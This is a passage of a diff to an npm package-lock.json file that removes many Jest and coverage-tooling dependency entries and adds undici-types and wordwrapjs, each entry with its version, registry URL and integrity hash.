"sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/command-line-args": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", - "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", - "license": "MIT", - "dependencies": { - "array-back": "^6.2.2", - "find-replace": "^5.0.2", - "lodash.camelcase": "^4.3.0", - "typical": "^7.2.0" - }, - "engines": { - "node": ">=12.20" - }, - "peerDependencies": { - "@75lb/nature": "latest" - }, - "peerDependenciesMeta": { - "@75lb/nature": { - "optional": true - } - } - }, - "node_modules/command-line-usage": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", - "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", - "license": "MIT", - "dependencies": { - "array-back": "^6.2.2", - "chalk-template": "^0.4.0", - "table-layout": "^4.1.0", - "typical": "^7.1.1" - }, - "engines": { - "node": ">=12.20.0" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } + "node_modules/undici-types": { + "version": "6.19.8", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", + "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", + "license": "MIT" }, - "node_modules/debug": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", - "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "node_modules/wordwrapjs": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/wordwrapjs/-/wordwrapjs-5.1.0.tgz", + "integrity": "sha512-JNjcULU2e4KJwUNv6CHgI46UvDGitb6dGryHajXTDiLgg1/RiGoPSDw4kZfYnwGtEXf2ZMeIewDQgFGzkCB2Sg==", "license": "MIT", - "dependencies": { - "ms": "^2.1.3" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.470", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.470.tgz", - "integrity": "sha512-zZM48Lmy2FKWgqyvsX9XK+J6FfP7aCDUFLmgooLJzA7v1agCs/sxSoBpTIwDLhmbhpx9yJIxj2INig/ncjJRqg==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-replace": { - "version": "5.0.2", - "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", - "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", - "license": "MIT", - "engines": { - "node": ">=14" - }, - "peerDependencies": { - "@75lb/nature": "latest" - }, - "peerDependenciesMeta": { - "@75lb/nature": { - "optional": true - } - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/flatbuffers": { - "version": "24.12.23", - "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", - "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==", - "license": "Apache-2.0" - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/hpagent": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", - "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", - "license": "MIT", - "engines": { - "node": ">=14" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - 